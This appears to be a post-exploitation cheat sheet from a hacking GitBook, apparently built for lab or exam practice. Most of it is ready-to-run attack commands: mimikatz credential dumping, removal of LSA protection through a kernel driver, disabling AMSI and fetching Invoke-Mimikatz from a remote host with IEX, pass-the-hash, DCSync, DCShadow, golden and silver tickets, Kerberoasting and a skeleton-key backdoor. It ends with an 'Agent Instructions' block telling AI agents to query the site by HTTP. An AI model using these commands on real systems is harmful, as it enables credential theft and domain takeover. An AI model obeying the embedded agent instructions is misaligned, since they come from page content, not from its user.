# Exfiltration ## PoC Linux ``` cat proof.txt && whoami && hostname && ip addr ``` ``` cat local.txt && whoami && hostname && ip addr ``` Windows ``` type proof.txt && whoami && hostname && ipconfig ``` ``` type local.txt && whoami && hostname && ipconfig ``` ## Catch the Flag **Windows** ``` dir "\proof*.txt" /s PS> gci -recurse -inculde FILENAME* ``` search credentials or password: ``` gci -path . -recurse -ea SilentlyContinue -Include *.txt,*.ini,*.yml,*.xml,*.ps1,*.cfg |select-string pass ``` **Linux** ``` find / -type f -iname "flag.txt" 2>/dev/null ``` ## Dump Active Directory with PS

[PS] Import-Module ActiveDirectory
[PS] Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -property * | Select-Object SAMAccountName, Description, DistinguishedName

## Dump with dump.exe make sure you able to access Lsass or you have managed the bypass LSA Protection to remove protection.
build it with configuration Release, x64, then run in the compromised user with NT AUTHORITY/SYSTEM priviledge. the result is in the directory `C:\Windows\Tasks\lsass.dmp`

then use this command to exctract lsass.dmp via kali linux: ``` pypykatz lsa minidump lsass.dmp ``` or via windows machine: ``` mimikatz.exe sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords ``` ## ## Dump with Mimikatz ref: cheatsheet: copy from: ### Bypass LSA Protection {% hint style="info" %} make sure mimikatz.sys in same folder with mimikatz.exe {% endhint %} run this command:

# detect LSA Protection
# <snip> ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory <snip>

``` .\mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit" ``` ### Bypass AV and LSA {% hint style="info" %} make sure the current shell is NT AUTHORITY\SYSTEM {% endhint %} copy mimidrv.sys or mimikats.sys (driver) into the target computer then create new service ``` sc create mimidrv binPath= C:\windows\tasks\mimidrv.sys type= kernel start= demand ``` `[SC] CreateService SUCCESS` start new service ``` sc start mimidrv ``` then you able to load mimikatz into memory with Invoke-Mimikatz ``` # disabled AMSI (new-object system.net.webclient).downloadstring('http://192.168.x.y/amsi.txt') |IEX # invoke-mimikatz with powershell (new-object system.net.webclient).downloadstring('http://192.168.x.y/Invoke-Mimikatz.ps1') |IEX ``` Disable LSA Protection ``` Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`"" ``` if success: ``` # mimikatz(powershell) # !processprotect /process:lsass.exe /remove # Process : lsass.exe PID 123 -> 00/00 [0-0-0] ``` Now you able to interact with Lsass. ### **\[Important to start first]**** Test Mimikatz** ``` privilege::debug # Privilege '20' OK => Working properly ``` ### **Password / hashes** ``` # dump logon users pass or ntlm hash sekurlsa::logonpasswords # dump hashes lsadump:sam lsadump::lsa [/inject | /patch] # hashcat -m 1000 ``` ### **Escalate privilege using NTLM Hash** ref: ``` # get NTLM hash of Administrator from `securlsa::logonpasswords sekurlsa::pth /user:Administrator /domain:lab.local /ntlm: /run:cmd ``` ### **DCsync (Priviledge Escalation AD)** \[requirement] user must have permission to domain: * Replication Directory Changes * Replication Directory Changes All ``` lsadump::dcsync /user:krbtgt lsadump::dcsync /user:administrator ``` ### **\[recommended to start]**** Elevate shell integrity** ``` # use when using evil-winrm, we get medium integrity shells token::elevate ``` ### **DCshadow** ``` #simple poc lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:description /value:"modified dcshadow" ``` #### **Attack DCshadow and DCsync (persistence domain admin / AD Attribute Takeover)** Use case: * Bypass MFA ``` # set update attribute token::elevate lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:telephoneNumber /value:"123-123-223" # Power up other mimikatz shell to push lsadump::dcshadow /push ``` ### **Golden / Silver Ticket** ``` # dump hash and SID lsadump::lsa /inject /name: [krbtgt | DOMAIN_ADMIN_ACCOUNT | SERVICE_ACCOUNT] # create golden ticket and pass-the-ticket kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500 /ptt # create silver ticket and pass-the-ticket kerberos::golden /user: /domain:DOMAINM /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103 /ptt # check misc::cmd dir \\IP\c$ [/user:USER PASS] PsExec.exe \\IP cmd.exe # Kerberoasing attack # ref: https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html kerberos::list /export # download ticket in C:\kerberoast and crack with tgsrepcrack.py ``` ### **Kerberos Skeleton key** Install backdoor to memory, and make all user can use same password "`mimikatz`". note: if the machine was reboot, this backdoor can't exists. ``` misc::skeleton # done, now accessing admin share > net use C:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz > dir \\Desktop-1\c$ /user:Machine1 mimikatz ``` ## Get DNS Zone ``` cd C:\Windows PS> gci -recurse -inculde * ``` Online request server:\ --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacker-mind.gitbook.io/hacker-mind/post-exploit/exfiltration.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.